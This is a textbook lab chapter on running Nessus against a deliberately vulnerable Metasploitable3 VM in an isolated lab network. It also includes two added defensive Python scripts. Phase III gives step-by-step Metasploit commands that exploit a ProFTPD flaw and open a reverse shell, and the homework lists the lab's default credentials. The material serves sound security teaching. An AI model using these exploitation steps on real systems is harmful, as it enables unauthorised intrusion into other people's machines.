45 Scanning and Enumeration – Vulnerability Scanning

Mathew J. Heath Van Horn, PhD

This lab helps students become familiar with the Nessus vulnerability scanner and how it can be used to find vulnerabilities to exploit on a network. Nessus by Tenable has been used in the industry for over 25 years. It is updated weekly with new vulnerability checks drawn from the Common Vulnerabilities and Exposures (CVE) database.

Learning Objectives

  • Perform a vulnerability scan of a vulnerable target using Nessus
  • Read and investigate ways to take advantage of detected vulnerabilities
  • Exploit a critical vulnerability using Metasploit

Prerequisites

Deliverables

  • 4 Screenshots are required
    • Nmap scan of the target network that identifies the target machine
    • Results of a completed Nessus advanced scan of the target machine
    • A Nessus report of the critical vulnerability
    • Metasploit report of the module that can be used against the vulnerability

Resources

Contributors and Testers

  • An idea proposed by Raechel Ferguson
  • Dante Rocca, Cybersecurity Student, ERAU-Prescott

Phase I – Install Nessus

Nessus has continuous updates.  If you skipped the Nessus installation from Chapter 12, you will need to do this now.  If you haven’t updated Nessus recently, you must complete the following steps. These steps are based on your prior knowledge from completing Section 1 of this book.

  1. Open the VirtualBox Manager and select the Kali VM
  2. Click on settings, click on network, and make sure it is attached to NAT
    Figure 1 – Changing the network settings of the Kali VM
  3. Press OK and start the Kali VM
  4. From the command line, start Nessus with the following command

    > sudo systemctl start nessusd.service

  5. Open the Nessus user interface by opening Firefox and going to this URL. It may say it is insecure but click advanced and accept the risk to continue

    https://kali:8834/

  6. Click on About –> Software Update –> Manual Software Update
  7. Click on Update all components then continue
    Figure 2 – Updating Nessus
  8. Let the software update.  This could take a while depending on the last time your Kali VM had access to the Internet
  9. Once the update has been completed, power off the Kali VM
  10. Return to the VirtualBox Manager and, on the Kali VM, switch the network adapter back to the generic driver
    Figure 3 – Switching NIC back to generic driver

Phase II – Running a Nessus Scan Against Metasploitable

Nessus is a popular vulnerability scanner that detects vulnerabilities in the services running on devices. This is useful for defensive purposes to find areas of weakness, but the same information can be used by attackers to find holes in the network.

  1. Open GNS3 workspace and wait for the green lights
  2. Start the following machines:
    • DHCP Server
    • Router
    • Kali VM
    • Metasploitable3-Linux
  3. Once all machines are running, find the IP address of the Metasploitable3-Linux box by running an Nmap scan of the 200.200.200.0/24 network from the Kali VM. In this example, the target has an IP address of 200.200.200.7

    > sudo nmap -O 200.200.200.0/24

  4. Once you have the IP, start Nessus with the following command

    > sudo systemctl start nessusd.service

  5. Open the interface by opening Firefox and going to this URL. It will say it is insecure but click advanced and accept the risk to continue

    https://kali:8834/

  6. Login to Nessus
  7. Click on New Scan
    Figure 4 – New Scan
  8. Click on Advanced Scan
    Figure 5 – Create a new advanced scan
  9. Complete the scan details
    • NAME – Meta3-Linux
    • DESCRIPTION – Scan of metasploitable3 linux VM
    • FOLDER – My Scans
    • TARGETS – 200.200.200.7
      Figure 6 – Configuring the scan details
  10. Click on Save
  11. Hit the play button on the right-hand side of the scan to start it. This will take a bit of time
    Figure 7 – Start Nessus scan on our target
    Figure Zzzzzz
  12. Once the scan begins, you can double-click on the scan and watch the progress
    Figure 8 – Nessus running a scan of our target
  13. Once the scan reports on vulnerabilities, you can double-click on the progress bar and it will show you a list of detected vulnerabilities
    Figure 9 – Reported vulnerabilities
  14. You can then double-click on any of the vulnerabilities to receive more information on it. In this figure, we clicked on one of the Mixed entries to see the individual results it groups together
    Figure 10 – Details of exploits
  15. Then you can double-click on any exploit to get more detailed information as well
    Figure 11 – Even more details of the vulnerability
  16. It took about 15 minutes for the scan to complete.  Your results will vary.  However, we can see that several vulnerabilities were detected including some critical vulnerabilities that need immediate attention
    Figure 12 – Nessus vulnerability scan completed
  17. Let’s investigate the critical vulnerability a bit further
    Figure 13 – Critical Vulnerability
    Figure 14 – FTP vulnerability details
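The Nessus interface can export a completed scan as a .nessus file (an XML document), which is the easier form to work with when there are many findings to sort through. The following is an added example, not part of this lab and not Tenable's or Nessus's own code: it flattens a constructed .nessus export into a list of findings, ranks them by severity with the ones Nessus marks as having a Metasploit module first, and cross-checks each finding's port against an nmap scan of the same host saved with -oG (the same port match that Phase III step 3 makes by eye). The scan output, plugin IDs, CVE and module names in both samples are placeholders I constructed, not values from the lab.

```python
import xml.etree.ElementTree as ET

# --- Constructed samples (not real lab output) ------------------------------
# What `sudo nmap -sV -oG scan.gnmap 200.200.200.7` might write for the target.
# Service banners are placeholders.
SAMPLE_GNMAP = """\
# Nmap scan initiated as: nmap -sV -oG scan.gnmap 200.200.200.7
Host: 200.200.200.7 ()\tStatus: Up
Host: 200.200.200.7 ()\tPorts: 21/open/tcp//ftp//ProFTPD (placeholder)/, 22/open/tcp//ssh//OpenSSH (placeholder)/, 80/open/tcp//http//Apache (placeholder)/\tIgnored State: closed (997)
"""

# A minimal .nessus (NessusClientData_v2) export for the same host.
# pluginID, cve and metasploit_name values are placeholders.
SAMPLE_NESSUS = """\
<?xml version="1.0" ?>
<NessusClientData_v2>
 <Report name="Meta3-Linux">
  <ReportHost name="200.200.200.7">
   <ReportItem port="21" svc_name="ftp" protocol="tcp" severity="4" pluginID="PLACEHOLDER-1" pluginName="ProFTPD critical finding (placeholder)" pluginFamily="FTP">
    <risk_factor>Critical</risk_factor>
    <cve>CVE-0000-0000</cve>
    <exploit_available>true</exploit_available>
    <exploit_framework_metasploit>true</exploit_framework_metasploit>
    <metasploit_name>placeholder_module</metasploit_name>
    <solution>Upgrade to a fixed ProFTPD release.</solution>
   </ReportItem>
   <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="2" pluginID="PLACEHOLDER-2" pluginName="SSH weak algorithms (placeholder)" pluginFamily="Misc.">
    <risk_factor>Medium</risk_factor>
    <exploit_available>false</exploit_available>
    <solution>Disable the weak algorithms in sshd_config.</solution>
   </ReportItem>
   <ReportItem port="0" svc_name="general" protocol="tcp" severity="0" pluginID="PLACEHOLDER-3" pluginName="Nessus Scan Information" pluginFamily="Settings">
    <risk_factor>None</risk_factor>
   </ReportItem>
  </ReportHost>
 </Report>
</NessusClientData_v2>
"""

# Nessus "severity" attribute values 0-4
SEVERITY = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}


def parse_gnmap(text):
    """Map host IP -> {port: service} for open TCP ports in nmap -oG output."""
    open_ports = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        ip = line.split()[1]
        open_ports.setdefault(ip, {})
        for field in line.split("\t"):
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # grepable port fields: port/state/proto/owner/service/rpc/version/
                port, state, proto, _owner, service = (entry.split("/") + [""] * 5)[:5]
                if state == "open" and proto == "tcp":
                    open_ports[ip][int(port)] = service
    return open_ports


def parse_nessus(xml_text):
    """Flatten a .nessus export into one dict per finding."""
    findings = []
    for host in ET.fromstring(xml_text).iter("ReportHost"):
        for item in host.iter("ReportItem"):
            sev = int(item.get("severity", "0"))
            findings.append({
                "host": host.get("name"),
                "port": int(item.get("port", "0")),
                "service": item.get("svc_name"),
                "severity": sev,
                "rating": SEVERITY.get(sev, "Unknown"),
                "plugin": item.get("pluginName"),
                "cves": [c.text for c in item.findall("cve")],
                # Nessus sets this flag when it knows of a Metasploit module for the finding
                "msf_module": item.findtext("metasploit_name")
                if item.findtext("exploit_framework_metasploit") == "true" else None,
                "solution": item.findtext("solution"),
            })
    return findings


def triage(findings, open_ports, min_severity=3):
    """Findings at or above min_severity, worst first, Metasploit-known first within
    a tier; each row records whether nmap also saw the port open (port 0 is a
    host-level finding with no port to confirm)."""
    rows = []
    for f in findings:
        if f["severity"] < min_severity:
            continue
        seen = open_ports.get(f["host"], {})
        rows.append({**f, "nmap_confirms": f["port"] == 0 or f["port"] in seen})
    return sorted(rows, key=lambda r: (-r["severity"], r["msf_module"] is None, r["port"]))


if __name__ == "__main__":
    for r in triage(parse_nessus(SAMPLE_NESSUS), parse_gnmap(SAMPLE_GNMAP)):
        print(f'{r["rating"]:8} {r["host"]}:{r["port"]} {r["plugin"]} '
              f'nmap_confirms={r["nmap_confirms"]} msf={r["msf_module"]} fix: {r["solution"]}')
```

To use it on your own results, replace the two sample strings with the contents of the exported .nessus file and of a scan saved with -oG. The ordering puts the findings that need immediate attention, and that an attacker has a ready-made module for, at the top of the list, which is the order a defender should patch in.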

Phase III – Making Use of the Information

Finding vulnerabilities is only part of the process. There are many ways to exploit vulnerabilities, which we will share in the following chapters, but for now, we don’t want to leave you hanging.  So we introduce an easy way to exploit this vulnerability so that you can close the loop on the process.

The Metasploit Framework is a tool for developing and executing exploit code against targets. It also includes anti-forensic and evasion tools. It is preinstalled in Kali, and we can leverage it quickly against our target machine. Metasploitable3 was developed to practice Metasploit attacks.

NOTE: Phase III was written separately from Phases I and II.  The target machine’s IP address changed from 200.200.200.7 to 200.200.200.8 due to DHCP.

  1. The exploit report included this in the description.  We are going to use this information to our advantage
    Figure 15 – Nessus tells us how Metasploit can take advantage of the vulnerability
  2. Open a terminal and run an Nmap scan directly against our target machine with the -sS (TCP SYN scan) and -sV (service version detection) flags to identify the FTP service port

    > sudo nmap -sS -sV 200.200.200.8

  3. We can see that port 21 matches the exploit identified by Nessus in Figure 14 above and has been known to be successfully attacked by Metasploit in the past in Figure 15 above
    Figure 16 – Nmap port 21 matches Nessus scan
  4. Open Metasploit at the command line prompt

    > msfconsole

  5. Now search for the FTP exploit by typing

    > search ProFTPD

  6. You can see that we get six results, but only one of them is for our version
    Figure 17 – Search for instances of ProFTPD exploit
  7. Now follow the directions on the screen and type

    > info 4

  8. We can see that using this exploit allows us to copy any file to the target machine’s website among other things
    Figure 18 – Details about the usable exploit
  9. This looks good to us, so type

    > use 4

  10. We haven’t set our payload yet, so it will assign a default one and remind us of it at the command prompt
    Figure 19 – Our default payload is being assigned
  11. We can view our settings for our custom attack on the target by typing

    > show options

  12. We are still missing some information in our current settings
    Figure 20 – Checking our settings and spotting some missing information
  13. Let us set our target as the remote host by typing

    > set rhosts 200.200.200.8

  14. The default SITEPATH is for an older version of the target, so update it by typing

    > set sitepath /var/www/html

  15. Double-check that the changes took effect by typing

    > show options

    Figure 21 – Checking the changes took place
  16. We can now set the payload.  See the various payload options by typing

    > show payloads

    Figure 22 – Showing and setting the payload
  17. Sometimes you have to try different payloads to see which are effective, but reverse_perl works for us

    > set payload 10

  18. Now we can run our exploit by typing

    > exploit

  19. We can see that a command shell has been opened on our target machine.
    Figure 23 – Executing the exploit on our target
  20. We can now run commands as if we were using our target machine

    > ip add

  21. We see that we are in the target machine
    Figure 24 – Command “ip add” shows that we are ‘in’
  22. We can also view our directory and list the files in that directory

    > pwd

    > ls

    Figure 25 – Viewing our directory and files
  23. Go ahead and poke about the system and see what else you can discover
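Steps 17 to 21 show the attacker's side of the exchange: the reverse_perl payload makes the target open a TCP connection back to Kali and hand it a command shell. On the target that shows up as an interpreter process (perl here) holding an outbound, established connection, which is a quick thing to look for when triaging a host you suspect has been hit. The following is an added example of mine, not part of this lab and not code from Metasploit or Nessus: it parses the output of `ss -tnp` on a Linux host and flags interpreter or shell processes with outbound connections. The `ss` output is a constructed sample (addresses, ports and PIDs are made up), and the interpreter list and the ephemeral-port threshold are assumptions that you would tune for your own systems.

```python
import re

# Constructed sample of `ss -tnp` output on the target while a reverse shell is
# open. The proftpd and sshd rows are normal inbound service connections; the
# perl row is the payload calling back out. All values are made up.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port   Peer Address:Port    Process
ESTAB  0      0      200.200.200.8:21     200.200.200.5:41022  users:(("proftpd",pid=1203,fd=5))
ESTAB  0      0      200.200.200.8:48210  200.200.200.5:4444   users:(("perl",pid=1301,fd=3))
ESTAB  0      0      200.200.200.8:22     200.200.200.5:50122  users:(("sshd",pid=900,fd=4))
ESTAB  0      0      200.200.200.8:52110  200.200.200.9:443    users:(("curl",pid=1400,fd=3))
"""

# Assumption: processes that have no business holding their own network socket
# on a server unless someone is driving them interactively.
INTERPRETERS = {"perl", "python", "python3", "sh", "bash", "dash", "nc", "ncat",
                "socat", "ruby", "php"}
# Assumption: Linux default lower bound of net.ipv4.ip_local_port_range. A local
# port in this range means the connection was opened outbound from this host.
EPHEMERAL_START = 32768

PROC_RE = re.compile(r'users:\(\("([^"]+)",pid=(\d+)')


def parse_ss(text):
    """Return one dict per ESTAB row: local/peer endpoints plus owning process."""
    conns = []
    for line in text.splitlines():
        parts = line.split(None, 5)          # state, recv-q, send-q, local, peer, process
        if len(parts) < 5 or parts[0] != "ESTAB":
            continue
        local, peer = parts[3], parts[4]
        proc_field = parts[5] if len(parts) > 5 else ""
        lhost, lport = local.rsplit(":", 1)
        phost, pport = peer.rsplit(":", 1)
        m = PROC_RE.search(proc_field)
        conns.append({
            "local": (lhost, int(lport)),
            "peer": (phost, int(pport)),
            "proc": m.group(1) if m else None,
            "pid": int(m.group(2)) if m else None,
        })
    return conns


def suspicious_outbound(conns):
    """Interpreter or shell processes holding an outbound (ephemeral local port)
    established connection: the footprint of a reverse shell."""
    return [c for c in conns
            if c["proc"] in INTERPRETERS and c["local"][1] >= EPHEMERAL_START]


if __name__ == "__main__":
    for c in suspicious_outbound(parse_ss(SAMPLE_SS)):
        print(f'pid {c["pid"]} ({c["proc"]}) -> {c["peer"][0]}:{c["peer"][1]} '
              f'from local port {c["local"][1]}')
```

On a live host, feed it the real output of `ss -tnp` (run as root so the process column is populated). Treat a hit as a lead, not a verdict: legitimate maintenance scripts also open outbound connections, so confirm with the process's parent, owning user and command line before acting.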

End of Lab

Deliverables

4 Screenshots are required

  • Nmap scan of the target network that identifies the target machine
  • Results of a completed Nessus advanced scan of the target machine
  • A Nessus report of the critical vulnerability
  • Metasploit report of the module that can be used against the vulnerability

Homeworks

Assignment 1 – Advanced scan with creds

The previous crew discovered the username and password of the target machine. Use the Nessus documentation to conduct an advanced scan using the SSH credentials: USERNAME: vagrant PASSWORD: vagrant. Identify any previously unknown critical vulnerabilities, produce the Nessus details on each vulnerability, and select a possible Metasploit module that could be used for each new vulnerability.

RECOMMENDED GRADING CRITERIA:

  • Screenshot of the Nessus Vulnerability Report
  • Screenshot of the Nessus details for each previously unknown critical vulnerability
  • Screenshot of one possible Metasploit module that could be used against each critical vulnerability

Assignment 2 – Advanced scan, with creds, against Windows

Start the Metasploitable3-Windows VM. Use the same credentials from Assignment 1 to run an advanced scan against the Meta3-Windows VM and identify all critical vulnerabilities that are unique to Windows machines. Produce the Nessus details on each vulnerability and select a possible Metasploit module that could be used for each vulnerability.

RECOMMENDED GRADING CRITERIA:

  • Screenshot of the Nessus Vulnerability Report
  • Screenshot of the Nessus details for each Windows-based critical vulnerability
  • Screenshot of one possible Metasploit module that could be used against each critical vulnerability


Figures for Printed Version

License

Mastering Enterprise Networks Copyright © 2024 by Mathew J. Heath Van Horn, PhD is licensed under a Creative Commons Attribution 4.0 International License, except where otherwise noted.